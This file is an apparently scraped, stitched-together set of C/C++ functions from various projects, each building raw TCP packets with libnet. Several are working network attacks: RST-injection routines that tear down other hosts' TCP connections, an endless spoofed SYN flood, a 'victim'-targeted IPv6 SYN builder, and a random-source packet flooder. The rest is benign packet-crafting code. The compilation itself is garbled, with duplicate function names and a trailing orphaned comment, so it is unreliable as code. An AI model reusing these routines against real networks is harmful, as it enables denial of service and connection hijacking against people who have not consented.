void nids_killtcp_seq(struct tcp_stream *a_tcp, int seqoff)
{
if (!l)
return;
tcp_tag = libnet_build_tcp(a_tcp->addr.source, a_tcp->addr.dest,
a_tcp->client.first_data_seq +
a_tcp->server.count + a_tcp->server.urg_count +
(seqoff?(a_tcp->server.window/2):0),
0, 0x4, 32000, 0, 0, LIBNET_TCP_H, NULL, 0, l, tcp_tag);
ip_tag =
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, 12345, 0, 64,
IPPROTO_TCP, 0, a_tcp->addr.saddr,
a_tcp->addr.daddr, 0, 0, l, ip_tag);
libnet_write(l);
tcp_tag = libnet_build_tcp(a_tcp->addr.dest, a_tcp->addr.source,
a_tcp->server.first_data_seq +
a_tcp->client.count + a_tcp->client.urg_count +
(seqoff?(a_tcp->client.window/2):0),
0, 0x4, 32000, 0,
0, LIBNET_TCP_H, NULL, 0, l, tcp_tag);
ip_tag =
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, 12345, 0, 64,
IPPROTO_TCP, 0, a_tcp->addr.daddr,
a_tcp->addr.saddr, 0, 0, l, ip_tag);
libnet_write(l);
}
void nids_killtcp_seq(struct tcp_stream *a_tcp, int seqoff)
{
char buf[IP_H + TCP_H];
if (libnetsock == 0)
return;
libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.saddr,
a_tcp->addr.daddr, 0, 0, buf);
libnet_build_tcp(a_tcp->addr.source, a_tcp->addr.dest,
a_tcp->client.first_data_seq +
a_tcp->server.count + a_tcp->server.urg_count +
(seqoff?(a_tcp->server.window/2):0),
0, 0x4, 32000, 0, 0, 0, buf + IP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
libnet_write_ip(libnetsock, buf, TCP_H + IP_H);
libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.daddr,
a_tcp->addr.saddr, 0, 0, buf);
libnet_build_tcp(a_tcp->addr.dest, a_tcp->addr.source,
a_tcp->server.first_data_seq +
a_tcp->client.count + a_tcp->client.urg_count +
(seqoff?(a_tcp->client.window/2):0),
0, 0x4, 32000, 0, 0, 0, buf + IP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
libnet_write_ip(libnetsock, buf, TCP_H + IP_H);
}
int buildTCP(int ack, int seqn){
uint32_t temp;
uint16_t control;
libnet_ptag_t tcpTag;
if(ack){
temp = sIP;
sIP=dIP;
dIP=temp;
control = (9<<1);
}
else
control = (1<<1);
memset(payload,8,PAYLOAD_L);
tcpTag = libnet_build_tcp(
sp,
dp,
seqn,
ack,
control,
8192,
0x0,
0,
LIBNET_TCP_H+PAYLOAD_L,
payload,
PAYLOAD_L,
l,
0);
return tcpTag;
}
void
send_tcp_pkts (libnet_t * l, libnet_plist_t * plist, libnet_ptag_t tcp_tag,
u_long seq)
{
int i;
u_short bport, eport;
while (libnet_plist_chain_next_pair (plist, &bport, &eport)
&& (bport <= eport) && (bport))
for (i = bport; i <= eport; i++)
{
tcp_tag = libnet_build_tcp (libnet_get_prand (LIBNET_PRu16),
i,
seq,
libnet_get_prand (LIBNET_PRu32),
TH_SYN,
libnet_get_prand (LIBNET_PRu16),
0, 0, LIBNET_TCP_H, NULL, 0, l, tcp_tag);
libnet_write (l);
usleep (1); /* kernel buffers will prevent high rate packet injection
* unless we sleep for a while (1usec is enough)
* There are cleaner ways of doing this... see libdnet
*/
}
}
libnet_ptag_t
build_pkt (libnet_t * l, u_long * seq, struct libnet_in6_addr src,
struct libnet_in6_addr victim)
{
libnet_ptag_t ip_tag, tcp_tag;
ip_tag = tcp_tag = LIBNET_PTAG_INITIALIZER;
libnet_seed_prand (l);
*seq = (u_long) libnet_get_prand (LIBNET_PRu32);
tcp_tag = libnet_build_tcp (0,
0,
*seq,
libnet_get_prand (LIBNET_PRu32),
TH_SYN,
libnet_get_prand (LIBNET_PRu16),
0, 0, LIBNET_TCP_H, NULL, 0, l, 0);
ip_tag = libnet_build_ipv6 (0,
0,
LIBNET_TCP_H,
IPPROTO_TCP, 64, src, victim, NULL, 0, l, 0);
return tcp_tag;
}
/*
* Inject 'normal' TCP packet
*/
int inject_tcp_packet(sess_key keyhash, u_int8_t flags, u_int16_t window)
{
// clear
libnet_clear_packet(l);
// build tcp
libnet_build_tcp(
sess_map[keyhash].tcp_sport, /* source TCP port */
sess_map[keyhash].tcp_dport, /* destination TCP port */
sess_map[keyhash].tcp_seq, /* sequence number */
sess_map[keyhash].tcp_ack, /* acknowledgement number */
flags, /* control flags */
window, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* total length */
NULL, /* payload */
0, /* payload length */
l, /* libnet context */
0 /* build new header */
);
// prepare ip packet
prep_ipv4(sess_map[keyhash].ip_src, sess_map[keyhash].ip_dst);
// packet injection
return libnet_write(l);
}
void tcp_answer_ack(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
struct libnet_ipv4_hdr *ip;
struct libnet_tcp_hdr *tcp;
u_int32_t seq, win, ack;
int len;
libnet_t *libnet;
libnet = (libnet_t *)user;
pkt += pcap_off;
len = pcap->caplen - pcap_off;
ip = (struct libnet_ipv4_hdr *)pkt;
tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
seq = ntohl(tcp->th_ack);
ack = ntohl(tcp->th_seq) + 1;
win = ntohs(tcp->th_win);
libnet_clear_packet(libnet);
libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
seq, ack, TH_ACK, win, 0, 0, LIBNET_TCP_H,
NULL, 0, libnet, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, ip->ip_dst.s_addr,
ip->ip_src.s_addr, NULL, 0, libnet, 0);
if (libnet_write(libnet) < 0)
warn("writing ACK failed");
}
static void
tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
struct libnet_ipv4_hdr *ip;
struct libnet_tcp_hdr *tcp;
char ctext[64];
u_int32_t seq, win;
int i, len;
libnet_t *l;
l = (libnet_t *)user;
pkt += pcap_off;
len = pcap->caplen - pcap_off;
ip = (struct libnet_ipv4_hdr *)pkt;
if (ip->ip_p != IPPROTO_TCP)
return;
tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST))
return;
seq = ntohl(tcp->th_ack);
win = ntohs(tcp->th_win);
snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:",
libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_dport));
for (i = 0; i < Opt_severity; i++) {
seq += (i * win);
libnet_clear_packet(l);
libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H,
NULL, 0, l, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, ip->ip_dst.s_addr,
ip->ip_src.s_addr, NULL, 0, l, 0);
if (libnet_write(l) < 0)
warn("write");
fprintf(stderr, "%s R %lu:%lu(0) win 0\n",
ctext,
(unsigned long) seq,
(unsigned long) seq);
}
++kill_counter;
if (Opt_max_kill && kill_counter >= Opt_max_kill) {
pcap_breakloop(pd);
}
}
int TCP_SF_Sender::tcpSF(unsigned int destip, unsigned short dport,unsigned int seq, unsigned int control, unsigned short IPid)
{
// TODO : now we use the fixed ethernet,we will do something to make it find ethernet by itself
char dev[DEV_MAX] ; /* set device name */
strcpy(dev,global_dev);
libnet_t *l = NULL;
libnet_ptag_t packetTag; // the tag return by some build functions
char errBuff[LIBNET_ERRBUF_SIZE] = {0};
// first is to initilize the library and create the envirnoment
l = libnet_init(LIBNET_RAW4,dev,errBuff);
if( NULL==l ){
return -1;
}
// create the tcp header
packetTag=libnet_build_tcp(
25555, // source port(fixed)
dport, // dest port
seq, // TODO : seq
0, // ack
control, // control flags
0, // window size
0, // checksum (0 for autofill)
0, // urgent pointer
LIBNET_TCP_H,// total length of the TCP packet (for checksum calculation)
NULL, // playload
0, // playload length
l, // the libnet context
0 // build a new one
);
// source ip is my IP
u_long source;
source = libnet_get_ipaddr4(l);
if( -1==int(source) ){
return -1;
}
// create the ip header
packetTag=libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H,
0,
IPid, // id
0,
60, // TTL
IPPROTO_TCP,
0,
source,
destip,
NULL,
0,
l,
0
);
// send packets
int packet_length = libnet_write(l);
// destory the session
libnet_destroy(l);
return packet_length;
}
int
send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short
src_prt, u_long dst_ip, u_short dst_prt)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H,
&buf) == -1)
{
perror("no packet memory");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);
libnet_build_ip(LIBNET_TCP_H,
0,
242,
0,
64,
IPPROTO_TCP,
src_ip,
dst_ip,
NULL,
0,
buf + LIBNET_ETH_H);
libnet_build_tcp(src_prt,
dst_prt,
111111,
999999,
TH_SYN,
32767,
0,
NULL,
0,
buf + LIBNET_IP_H + LIBNET_ETH_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H);
n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
+ LIBNET_TCP_H);
if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H)
{
fprintf(stderr, "Oopz. Only wrote %d bytes\n", n);
}
else
{
printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype);
}
libnet_destroy_packet(&buf);
return (n);
}
int update_TSUM(libnet_t *l, libnet_ptag_t t)
{
int sum = 0;
unsigned int tmp;
if (tx.tcp_sum != 0)
return 0;
sum += libnet_in_cksum((u_int16_t *) &tx.ip6_src, 16);
if (tx.ip_option_s && tx.ip6_segs)
sum += libnet_in_cksum((u_int16_t *) &tx.ip_option[tx.ip_option_s - 16], 16); // Use last IP address
else
sum += libnet_in_cksum((u_int16_t *) &tx.ip6_dst, 16);
tmp = htonl(tx.tcp_len);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(IPPROTO_TCP);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = ((htons(tx.sp) << 16) + htons(tx.dp));
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(tx.tcp_seq);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(tx.tcp_ack);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = ((ntohs(((tx.tcp_offset) << 12) + tx.tcp_control) << 16) + htons(tx.tcp_win));
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
tmp = htonl(tx.tcp_urg);
sum += libnet_in_cksum((u_int16_t *) &tmp, 4);
sum += tx.tcp_sum_part;
if (tx.tcp_payload_s)
sum += libnet_in_cksum((u_int16_t *) tx.tcp_payload, tx.tcp_payload_s);
tx.tcp_sum = ntohs(LIBNET_CKSUM_CARRY(sum));
t = libnet_build_tcp (tx.sp,
tx.dp,
tx.tcp_seq,
tx.tcp_ack,
tx.tcp_control,
tx.tcp_win,
tx.tcp_sum,
tx.tcp_urg,
tx.tcp_len,
tx.tcp_payload_s ? tx.tcp_payload : NULL,
tx.tcp_payload_s,
l,
t);
return t;
}
uint16_t makeTCP(libnet_t *l, uint8_t *SA, uint8_t *DA,
uint16_t seqn, uint16_t sport, uint16_t dport,
uint32_t sip, uint32_t dip, uint8_t *PAYLOAD, int ack)
{
uint16_t tag_t, bytes_w, control;
if(ack)
control = (9<<1);
else
control = (1<<1);
tcp_t = libnet_build_tcp (
sport, dport, seqn, 0,
control, 8192, 0x0, 0,
LIBNET_TCP_H+PAYLOAD_L,
PAYLOAD,
PAYLOAD_L,
l,
tcp_t
);
if(!tcp_t)
{
fprintf(stderr,"libnet_build_tcp() failed: %s\n",errbuf);
goto bad;
}
tag_t = buildIP_h(l,
sip, dip,IPPROTO_TCP);
if(!tag_t)
{
fprintf(stderr,"libnet_build_ip() failed: %s\n",errbuf);
goto bad;
}
tag_t = buildETH_h(l,DA, SA);
if(!tag_t)
{
fprintf(stderr,"libnet_build_eth() failed: %s\n",errbuf);
goto bad;
}
bytes_w = libnet_write(l);
if(bytes_w == -1)
{
fprintf(stderr,"libnet_write() failed: %s\n",errbuf);
goto bad;
}
return (seqn=LIBNET_IPV4_H+LIBNET_TCP_H+PAYLOAD_L+1);
bad:
return -1;
}
///////////////////////////////////////////////////////////////////////
//
// Applies another TCP SQNR from a specified range to a given TCP-PTAG
//
// RETURN VALUE: '1' if tx.txp_seq restarts
//
int update_TCP_SQNR(libnet_t *l, libnet_ptag_t t)
{
u_int32_t diff;
int i=0;
tx.tcp_seq += tx.tcp_seq_delta;
diff = tx.tcp_seq_stop - tx.tcp_seq_start;
if (diff < tx.tcp_seq_stop) // start < stop
{
if (tx.tcp_seq > tx.tcp_seq_stop)
{
tx.tcp_seq = tx.tcp_seq_start;
i=1;
}
}
else // stop < start
{
if ( (tx.tcp_seq<tx.tcp_seq_start) &&
(tx.tcp_seq>tx.tcp_seq_stop) )
{
tx.tcp_seq = tx.tcp_seq_start;
i=1;
}
}
t = libnet_build_tcp (tx.sp,
tx.dp,
tx.tcp_seq,
tx.tcp_ack,
tx.tcp_control,
tx.tcp_win,
tx.tcp_sum,
tx.tcp_urg,
tx.tcp_len,
(tx.tcp_payload_s) ? tx.tcp_payload : NULL,
tx.tcp_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr, " mz/update_TCP_SQNR: Can't build TCP header: %s\n", libnet_geterror(l));
exit (0);
}
return i;
}
/*
* Inject TCP packet with payload
*/
int inject_tcp_packet(sess_key keyhash, char *payload, u_int8_t flags, u_int16_t window)
{
// clear
libnet_clear_packet(l);
// build tcp
libnet_build_tcp(
sess_map[keyhash].tcp_sport, /* source TCP port */
sess_map[keyhash].tcp_dport, /* destination TCP port */
sess_map[keyhash].tcp_seq, /* sequence number */
sess_map[keyhash].tcp_ack, /* acknowledgement number */
flags, /* control flags */
window, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H +
(payload[0]!='\0' ? strlen(payload) : 0), /* total length */
(payload[0]!='\0' ? (unsigned char *)payload : NULL), /* payload */
(payload[0]!='\0' ? strlen(payload) : 0), /* payload length */
l, /* libnet context */
0 /* build new header */
);
// prepare ip packet
if(payload[0]!='\0') {
// fragmentation
if(progopt.frag) {
prep_ipv4(sess_map[keyhash].ip_src, sess_map[keyhash].ip_dst, strlen(payload), progopt.frag);
}
else {
prep_ipv4(sess_map[keyhash].ip_src, sess_map[keyhash].ip_dst, strlen(payload));
}
} else {
prep_ipv4(sess_map[keyhash].ip_src, sess_map[keyhash].ip_dst);
}
// packet injection
return libnet_write(l);
}
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
char szErrBuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip;
libnet_ptag_t tcp;
wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
wxString sGameHost = CONFIG(wxString, "Network/GameHost");
int nGamePort = CONFIG(int, "Network/GamePort");
shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
if (!pNodeInfo) {
//Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
return;
}
NetInfo &netInfo = Info::Get()->GetNetInfo();
//This is pretty inefficient since I constantly init libnet and destroy it. It would be better
//if we could init once and just keep changing the sequence number and destination ip.
for (u_int x = 0; x < m_nSeverity; x++) {
u_int32_t seq_out = pNodeInfo->last_sentack;
libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
libnet_seed_prand(pLibnet);
tcp = libnet_build_tcp(nPort, nGamePort,
seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);
u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);
ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
src_ip, dst_ip, NULL, 0, pLibnet, 0);
libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);
libnet_write(pLibnet);
libnet_destroy(pLibnet);
}
}
void send_syns(libnet_t *libnet, u_int32_t source_addr, u_int32_t target_addr, unsigned int port, useconds_t delay) {
libnet_seed_prand(libnet);
for(;;) {
libnet_clear_packet(libnet);
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), port,
libnet_get_prand(LIBNET_PRu32), libnet_get_prand(LIBNET_PRu32),
TH_SYN, 8192, 0, 0, LIBNET_TCP_H,
NULL, 0, libnet, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, source_addr,
target_addr, NULL, 0, libnet, 0);
if (libnet_write(libnet) < 0)
warn("writing SYN failed");
usleep(delay);
}
}
int main()
{
int c, i, seqn;
libnet_t *l;
libnet_ptag_t tcp, ip, eth;
uint8_t *payload, SA[6], DA[6];
ushort payload_s;
uint32_t src_ip, dst_ip;
uint16_t src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
struct libnet_ether_addr *enet_src;
payload_s = 10;
payload = malloc(payload_s*sizeof(uint8_t));
memset(payload,0,payload_s);
l = libnet_init(LIBNET_LINK, "nf2c0", errbuf);
if(l == NULL){
printf("libnet_init() error\n");
goto bad;
}
enet_src = libnet_get_hwaddr(l);
src_ip = libnet_get_ipaddr4(l);
dst_ip = (192) | (168<<8) | (101<<16) | (20);
//char *srcip;
//srcip = libnet_addr2name4(dst_ip,LIBNET_DONT_RESOLVE);
//printf("conversion: %s %d\n", srcip,LIBNET_IPV4_H+LIBNET_TCP_H+LIBNET_ETH_H+payload_s);
//return 0;
sprintf((char*)SA,"%02x:%02x:%02x:%02x:%02x:%02x",
(uint8_t)enet_src->ether_addr_octet[0],
(uint8_t)enet_src->ether_addr_octet[1],
(uint8_t)enet_src->ether_addr_octet[2],
(uint8_t)enet_src->ether_addr_octet[3],
(uint8_t)enet_src->ether_addr_octet[4],
(uint8_t)enet_src->ether_addr_octet[5]);
sprintf((char*)DA,"%02x:%02x:%02x:%02x:%02x:%02x",
0x0,0x4E,0x46,0x32,0x43,0x0);
src_prt = 80;
dst_prt = 1010;
//src_ip = (192) | (164<<8)| (0<<16) | (55<<24);
tcp = ip = eth = LIBNET_PTAG_INITIALIZER;
//for(i=1;i<11;i++){
for(i=0;i<10;i++){
seqn=i*(LIBNET_TCP_H+payload_s+1);
tcp = libnet_build_tcp(
src_prt,
dst_prt,
seqn,
seqn+LIBNET_TCP_H+payload_s+1,
TH_SYN | TH_ACK,
0,
0,
10,
LIBNET_TCP_H+payload_s,
payload, payload_s, l, tcp);
if(tcp ==-1){
printf("libnet_build_tcp() error\n");
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,
0,
242,
0,
64,
IPPROTO_TCP,
0,
src_ip,
dst_ip,
NULL,
0,
l,
ip);
if(ip==-1){
printf("libnet_build_ipv4() error\n");
goto bad;
}
eth = libnet_build_ethernet(
DA,
SA,
ETHERTYPE_IP,
NULL,
0,
l,
eth);
if(eth==-1){
printf("libnet_build_ethernet() error\n");
goto bad;
}
c = libnet_write(l);
if(c==-1){
printf("libnet_write() error\n");
goto bad;
}
else
printf("Wrote %d byte TCP packet.\nSeqNum: %d, ackNum: %d\n\n",c,seqn,seqn+LIBNET_TCP_H+payload_s+1);
//printf("Wrote %d byte TCP packet.\n",c);
sleep(1);
}
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
exit(EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
int i, loop;
/* no payload yet */
int size = LIBNET_PACKET;
opt.seqn = opt.ackn = opt.flags = 0;
opt.dport = opt.sport = opt.frag = 0;
opt.ttl = 255;
opt.winsize = 16384;
opt.tos = 0x08;
signal (SIGINT, (void (*)()) abort);
srand (time (NULL) + getpid ());
srandom (time (NULL) + getpid ());
banner ();
parse_args (argc, argv);
if (!whocares)
{
if (!local)
{
if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE)))
{
libnet_error (LIBNET_ERR_FATAL,
":: invalid destination IP address: %s\n", dsthost);
exit (1);
}
printf (":: destination host - %s\n", dsthost);
}
else
printf (":: destination host - local\n");
}
else
printf (":: destination host - whocares\n");
printf (":: destination port(s)");
for (i = 1; i < ports + 1; i++)
printf (" - %d", portarray[i]);
printf ("\n");
if (libnet_init_packet (size, &packet) == NULL)
{
libnet_error (LIBNET_ERR_FATAL,
":: libnet_init_packet failed\n");
}
if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n");
}
printf (":: spanking...\n");
printf (":: press ^C to end...\n");
for (;;)
{
for (i = 1; i < ports + 1; i++)
{
if (whocares)
change2 = random () & 01;
if (ismult)
{
opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
else
{
opt.src = rand ();
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
if (isrand)
{
loop = rand () % 5;
for (i = 0; i <= loop; i++)
opt.flags |= flag_array[rand () % 5];
opt.frag = frag_array[rand () % 3];
opt.ackn = random ();
opt.sport = 1024 + rand () % 32000;
opt.tos = tos_array[rand () % 3];
opt.ttl = rand () % 255;
opt.winsize = rand () % 32000;
if (change)
ismult = random () & 01;
}
opt.ident = random ();
opt.seqn = random ();
if (!stream)
opt.ackn = random ();
if (portarray[i] == 0)
opt.dport = rand () % 1024;
else
opt.dport = portarray[i];
libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);
libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H);
if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
}
libnet_write_ip (s, packet, size);
}
}
return 1;
}
/* packet processing callback */
void my_callback(u_char *useless, const struct pcap_pkthdr* pkthdr,
const u_char* packet)
{
// variables for constructing packets
u_long seq, ack; /* seq/ack numbers */
u_long src_ip, dst_ip;
u_short src_prt, dst_prt, win;
u_char ttl; /* TTL of IP */
u_char flags = 0x00; /* tcp flag */
struct in_addr addr, saddr, daddr;
// for extracting data from packets
const struct libnet_ipv4_hdr *iph; /* The IP header */
const struct libnet_tcp_hdr *tcph; /* The TCP header */
/* For readability, make variables for the sizes of each of the structures */
int size_ethernet = 14; // sizeof(struct ether_header);
int size_ip = 20; // sizeof(struct iphdr);
int size_tcp = 20; // sizeof(struct tcphdr);
iph = (struct libnet_ipv4_hdr*)(packet + size_ethernet);
tcph = (struct libnet_tcp_hdr*)(packet + size_ethernet + size_ip);
/* constructing and sending RST packet */
saddr = iph->ip_src;
daddr = iph->ip_dst;
src_ip = daddr.s_addr;
dst_ip = saddr.s_addr;
src_prt = ntohs(tcph->th_dport);
dst_prt = ntohs(tcph->th_sport); /* dst port */
seq = ntohl(tcph->th_ack);
ack = ntohl(tcph->th_seq) + 1;
win = ntohs(tcph->th_win); //keep the same win
flags = TH_RST;
ttl = 0x81;
pay_s = 0;
// fprintf(stderr, "here i=: %d pay_s = %d \n", i, pay_s);
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
seq, /* seq libnet_get_prand(LIBNET_PRu32), */
ack, /* ack libnet_get_prand(LIBNET_PRu32), */
flags, /* TCP flags */
win, /* win libnet_get_prand(LIBNET_PRu16), */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
NULL, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
ip = libnet_build_ipv4( /* building ip */
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
ttl, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
c = libnet_write(l); /* Write it to the wire. */
/* printf("c= %ud\n", c); */
/**--- for debugging only */
fprintf(stderr, "%d bytes sent\n", c);
addr.s_addr = src_ip;
fprintf(stderr, "Src IP: %s ==>", inet_ntoa(addr));
addr.s_addr = dst_ip;
fprintf(stderr, "Dst IP: %s\n", inet_ntoa(addr));
fprintf(stderr, "Dst port: %d\n", dst_prt);
fprintf(stderr, "Src port: %d\n", src_prt);
fprintf(stderr, "seq: %lu ack: %lu\n", seq, ack );
fflush(stderr);
/*--- **/
//printf("Reply %d: RST = %d Seq = %lu TTL = %d Win = %u \n", count,
// tcp->th_flags, ntohl(tcp->th_seq), ip->ip_ttl, ntohs(tcp->th_win));
} // end of callback
static int send_fin(struct libsoccr_sk *sk, struct libsoccr_sk_data *data,
unsigned data_size, uint8_t flags)
{
int ret, exit_code = -1;
char errbuf[LIBNET_ERRBUF_SIZE];
int mark = SOCCR_MARK;;
int libnet_type;
libnet_t *l;
if (sk->dst_addr->sa.sa_family == AF_INET6)
libnet_type = LIBNET_RAW6;
else
libnet_type = LIBNET_RAW4;
l = libnet_init(
libnet_type, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL) {
loge("libnet_init failed (%s)\n", errbuf);
return -1;
}
if (setsockopt(l->fd, SOL_SOCKET, SO_MARK, &mark, sizeof(mark))) {
logerr("Can't set SO_MARK (%d) for socket\n", mark);
goto err;
}
ret = libnet_build_tcp(
ntohs(sk->dst_addr->v4.sin_port), /* source port */
ntohs(sk->src_addr->v4.sin_port), /* destination port */
data->inq_seq, /* sequence number */
data->outq_seq - data->outq_len, /* acknowledgement num */
flags, /* control flags */
data->rcv_wnd, /* window size */
0, /* checksum */
10, /* urgent pointer */
LIBNET_TCP_H + 20, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ret == -1) {
loge("Can't build TCP header: %s\n", libnet_geterror(l));
goto err;
}
if (sk->dst_addr->sa.sa_family == AF_INET6) {
struct libnet_in6_addr src, dst;
memcpy(&dst, &sk->dst_addr->v6.sin6_addr, sizeof(dst));
memcpy(&src, &sk->src_addr->v6.sin6_addr, sizeof(src));
ret = libnet_build_ipv6(
0, 0,
LIBNET_TCP_H, /* length */
IPPROTO_TCP, /* protocol */
64, /* hop limit */
dst, /* source IP */
src, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
} else if (sk->dst_addr->sa.sa_family == AF_INET)
ret = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + 20, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
sk->dst_addr->v4.sin_addr.s_addr, /* source IP */
sk->src_addr->v4.sin_addr.s_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
else {
loge("Unknown socket family\n");
goto err;
}
if (ret == -1) {
loge("Can't build IP header: %s\n", libnet_geterror(l));
goto err;
}
ret = libnet_write(l);
if (ret == -1) {
loge("Unable to send a fin packet: %s\n", libnet_geterror(l));
goto err;
}
exit_code = 0;
err:
libnet_destroy(l);
return exit_code;
}
///////////////////////////////////////////////////////////////////////////////////
//
// Applies another SOURCE PORT from a specified range to a given UDP- or TCP-PTAG.
//
// Note: tx.sp MUST be already initialized with tx.sp_start
// This is done by 'get_port_range()' in tools.c.
//
// RETURN VALUE: '1' if tx.sp restarts
//
